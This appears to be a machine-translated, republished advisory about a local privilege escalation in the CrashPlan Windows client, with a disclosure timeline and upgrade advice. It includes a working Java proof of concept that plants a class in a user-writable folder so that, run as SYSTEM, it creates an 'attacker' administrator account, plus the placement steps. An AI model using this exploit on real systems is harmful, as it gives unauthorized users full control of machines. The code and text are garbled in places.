Crashplan Windows client Local Elevation of Privilege Vulnerability repair suggestions, crashplan Client

Source: Internet
Author: User
Tags windows 7 x64 crashplan

Crashplan Windows client Local Elevation of Privilege Vulnerability repair suggestions, crashplan Client

Crashplan Windows client Local Elevation of Privilege Vulnerability repair suggestions, this article is about CrashPlan Windows client 4.8.2.4, the existence of Local Elevation of Privilege Vulnerability reporting and technical analysis. This vulnerability can be abused by any local user and gain full control over the operating system. Currently, this vulnerability has been verified on the fully-fixed Windows 7 x64 English version.
The fundamental problem is that the Windows Service CrashPlan backup service loads and executes files from Insecure File System Locations C: \ ProgramData \ CrashPlan.

Among them, the Java Class file is searched and finally loaded from there. This causes the CLASS side-loading vulnerability.

The default file system ACL allows any local user to append new files.

Therefore, malicious files can be deleted. To use it, I constructed the following Java classes:
Package org. slf4j. ext;
Import java. io. Serializable;
Import java. io. ByteArrayInputStream;
Import java. io. ByteArrayOutputStream;
Import java. util. Date;
Import java. util. HashMap;
Import java. util. Iterator;
Import java. util. Map;
Import java. beans. XMLDecoder;
Import java. beans. XMLEncoder;
Import java. beans. ExceptionListener;
/**
* Base class for Event Data. Event Data contains data to be logged about
* Event. Users may extend this class for each EventType they want to log.
*
* @ Author Ralph Goers
*/
Public class EventData implements Serializable {
Static
{
Try {
Runtime rt = Runtime. getRuntime ();
Process pr = rt.exe c ("cmd.exe/C \" net user attacker Batman42/add & net localgroup Administrators attacker/add \"");
} Catch (Exception e ){
E. printStackTrace ();
}
}
/**
* Default Constructor
*/
Public EventData (){
}
}
To inject your own commands, we use Java static initialization program. These will be executed immediately after the JVM loads the class. To compile it, you only need to use javac:
Javac EventData. java
Finally, put the compiled Java class file in the C: \ ProgramData \ CrashPlan \ lang \ org \ slf4j \ ext folder to be created.

After the SYSTEM restarts, this Java class will be loaded and our code will be executed with the SYSTEM permission. In this example, an attacker adds a local administrator account to the operating system.

Repair suggestions
Upgrade the vulnerability version to the latest version as soon as possible.
Timeline
2017.5.18: vulnerability confirmation
2017.5.22: Record and notify the manufacturer
2017.5.25: the vendor confirms the vulnerability and urgent repair
2017.6.13: fixed version released. And released relevant instructions.
2018.2.15: Public Disclosure
 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.